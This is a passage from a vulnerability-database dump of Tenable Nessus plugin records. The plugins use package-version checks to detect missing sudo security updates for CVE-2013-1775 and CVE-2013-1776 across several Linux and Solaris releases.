pkgname:\"sudo\", pkgver:\"1.7.2p1-1ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"sudo-ldap\", pkgver:\"1.7.2p1-1ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"sudo\", pkgver:\"1.7.4p6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"sudo-ldap\", pkgver:\"1.7.4p6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"sudo\", pkgver:\"1.8.3p1-1ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"sudo-ldap\", pkgver:\"1.8.3p1-1ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"sudo\", pkgver:\"1.8.5p2-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"sudo-ldap\", pkgver:\"1.8.5p2-1ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-ldap\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:44", "description": " - update to 1.8.6p7\n\n - fixes CVE-2013-1775 and CVE-2013-1776\n\n - fixed several packaging issues (thanks to ville.skytta\n at iki.fi)\n\n - build with system zlib.\n\n - let rpmbuild strip libexecdir/*.so.\n\n - own the %%{_docdir}/sudo-* dir.\n\n - fix some rpmlint warnings (spaces vs tabs, unescaped\n macros).\n\n - fix bogus %%changelog dates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-03-20T00:00:00", "title": "Fedora 17 : sudo-1.8.6p7-1.fc17 (2013-3270)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "modified": "2013-03-20T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:sudo"], "id": "FEDORA_2013-3270.NASL", "href": "https://www.tenable.com/plugins/nessus/65619", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3270.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65619);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n script_bugtraq_id(58203, 58207);\n script_xref(name:\"FEDORA\", value:\"2013-3270\");\n\n script_name(english:\"Fedora 17 : sudo-1.8.6p7-1.fc17 (2013-3270)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - update to 1.8.6p7\n\n - fixes CVE-2013-1775 and CVE-2013-1776\n\n - fixed several packaging issues (thanks to ville.skytta\n at iki.fi)\n\n - build with system zlib.\n\n - let rpmbuild strip libexecdir/*.so.\n\n - own the %%{_docdir}/sudo-* dir.\n\n - fix some rpmlint warnings (spaces vs tabs, unescaped\n macros).\n\n - fix bogus %%changelog dates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916365\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-March/100498.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?455f1f89\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"sudo-1.8.6p7-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:44", "description": " - update to 1.8.6p7\n\n - fixes CVE-2013-1775 and CVE-2013-1776\n\n - fixed several packaging issues (thanks to ville.skytta\n at iki.fi)\n\n - build with system zlib.\n\n - let rpmbuild strip libexecdir/*.so.\n\n - own the %%{_docdir}/sudo-* dir.\n\n - fix some rpmlint warnings (spaces vs tabs, unescaped\n macros).\n\n - fix bogus %%changelog dates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-03-17T00:00:00", "title": "Fedora 18 : sudo-1.8.6p7-1.fc18 (2013-3297)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "modified": "2013-03-17T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:sudo"], "id": "FEDORA_2013-3297.NASL", "href": "https://www.tenable.com/plugins/nessus/65590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3297.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65590);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n script_bugtraq_id(58203, 58207);\n script_xref(name:\"FEDORA\", value:\"2013-3297\");\n\n script_name(english:\"Fedora 18 : sudo-1.8.6p7-1.fc18 (2013-3297)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - update to 1.8.6p7\n\n - fixes CVE-2013-1775 and CVE-2013-1776\n\n - fixed several packaging issues (thanks to ville.skytta\n at iki.fi)\n\n - build with system zlib.\n\n - let rpmbuild strip libexecdir/*.so.\n\n - own the %%{_docdir}/sudo-* dir.\n\n - fix some rpmlint warnings (spaces vs tabs, unescaped\n macros).\n\n - fix bogus %%changelog dates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916365\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-March/100157.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f54496bd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"sudo-1.8.6p7-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:09", "description": "sudo was updated to fix two security issues, where adjusting the time\nof the syste could be used to regain access to sudo sessions if they\nonc were granted. (CVE-2013-1775,CVE-2013-1776)", "edition": 17, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : sudo (openSUSE-SU-2013:0495-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:sudo-debuginfo", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:sudo-devel", "p-cpe:/a:novell:opensuse:sudo", "p-cpe:/a:novell:opensuse:sudo-debugsource", "cpe:/o:novell:opensuse:12.2"], "id": "OPENSUSE-2013-221.NASL", "href": "https://www.tenable.com/plugins/nessus/74928", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-221.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74928);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n\n script_name(english:\"openSUSE Security Update : sudo (openSUSE-SU-2013:0495-1)\");\n script_summary(english:\"Check for the openSUSE-2013-221 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"sudo was updated to fix two security issues, where adjusting the time\nof the syste could be used to regain access to sudo sessions if they\nonc were granted. (CVE-2013-1775,CVE-2013-1776)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-03/msg00066.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:sudo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1|SUSE12\\.2|SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1 / 12.2 / 12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-1.8.2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-debuginfo-1.8.2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-debugsource-1.8.2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"sudo-devel-1.8.2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"sudo-1.8.5p2-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"sudo-debuginfo-1.8.5p2-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"sudo-debugsource-1.8.5p2-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"sudo-devel-1.8.5p2-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"sudo-1.8.6p3-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"sudo-debuginfo-1.8.6p3-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"sudo-debugsource-1.8.6p3-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"sudo-devel-1.8.6p3-3.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:49:20", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through\n 1.8.6p6 allows local users or physically proximate\n attackers to bypass intended time restrictions and\n retain privileges without re-authenticating by setting\n the system clock and sudo user timestamp to the epoch.\n (CVE-2013-1775)\n\n - sudo 1.3.5 through 1.7.10 and 1.8.0 through 1.8.5, when\n the tty_tickets option is enabled, does not properly\n validate the controlling terminal device, which allows\n local users with sudo permissions to hijack the\n authorization of another terminal via vectors related to\n connecting to the standard input, output, and error file\n descriptors of another terminal. NOTE: this is one of\n three closely-related vulnerabilities that were\n originally assigned CVE-2013-1776, but they have been\n SPLIT because of different affected versions.\n (CVE-2013-1776)", "edition": 23, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : sudo (multiple_permissions_privileges_and_access)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.1", "p-cpe:/a:oracle:solaris:sudo"], "id": "SOLARIS11_SUDO_20130611.NASL", "href": "https://www.tenable.com/plugins/nessus/80779", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80779);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : sudo (multiple_permissions_privileges_and_access)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through\n 1.8.6p6 allows local users or physically proximate\n attackers to bypass intended time restrictions and\n retain privileges without re-authenticating by setting\n the system clock and sudo user timestamp to the epoch.\n (CVE-2013-1775)\n\n - sudo 1.3.5 through 1.7.10 and 1.8.0 through 1.8.5, when\n the tty_tickets option is enabled, does not properly\n validate the controlling terminal device, which allows\n local users with sudo permissions to hijack the\n authorization of another terminal via vectors related to\n connecting to the standard input, output, and error file\n descriptors of another terminal. NOTE: this is one of\n three closely-related vulnerabilities that were\n originally assigned CVE-2013-1776, but they have been\n SPLIT because of different affected versions.\n (CVE-2013-1776)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/multiple-permissions,-privileges,-and-access-control-vulnerabilities-in-sudo\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a9758ddf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.1.7.5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:sudo\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^sudo$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.7.0.5.0\", sru:\"SRU 11.1.7.5.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : sudo\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"sudo\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T08:55:50", "description": "From Red Hat Security Advisory 2013:1701 :\n\nAn updated sudo package that fixes two security issues, several bugs,\nand adds two enhancements is now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs :\n\n* Previously, sudo did not support netgroup filtering for sources from\nthe System Security Services Daemon (SSSD). Consequently, SSSD rules\nwere applied to all users even when they did not belong to the\nspecified netgroup. With this update, netgroup filtering for SSSD\nsources has been implemented. As a result, rules with a netgroup\nspecification are applied only to users that are part of the netgroup.\n(BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a\ncommand, it reset the value of the RLIMIT_NPROC resource limit to the\nparent's value of this limit if both the soft (current) and hard\n(maximum) values of RLIMIT_NPROC were not limited. An upstream patch\nhas been provided to address this bug and RLIMIT_NPROC can now be set\nto 'unlimited'. (BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was\nnot logged to the /var/log/secure file as before. Consequently, user\nname 'root' was always recorded instead of the real user name. With\nthis update, the previous behavior of sudo has been restored. As a\nresult, the expected user name is now written to /var/log/secure.\n(BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a\nbuffer overflow could have occurred in certain cases. This condition\nhas been fixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements :\n\n* With this update, sudo has been modified to send debug messages\nabout netgroup matching to the debug log. These messages should\nprovide better understanding of how sudo matches netgroup database\nrecords with values from the running system and what the values are\nexactly. (BZ#848111)\n\n* With this update, sudo has been modified to accept the ipa_hostname\nvalue from the /etc/sssd/sssd.conf configuration file when matching\nnetgroups. (BZ#853542)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues and add these\nenhancements.", "edition": 21, "published": "2013-11-27T00:00:00", "title": "Oracle Linux 6 : sudo (ELSA-2013-1701)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "modified": "2013-11-27T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:sudo", "p-cpe:/a:oracle:linux:sudo-devel"], "id": "ORACLELINUX_ELSA-2013-1701.NASL", "href": "https://www.tenable.com/plugins/nessus/71112", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:1701 and \n# Oracle Linux Security Advisory ELSA-2013-1701 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71112);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-2776\", \"CVE-2013-2777\");\n script_bugtraq_id(58203, 58207, 62741);\n 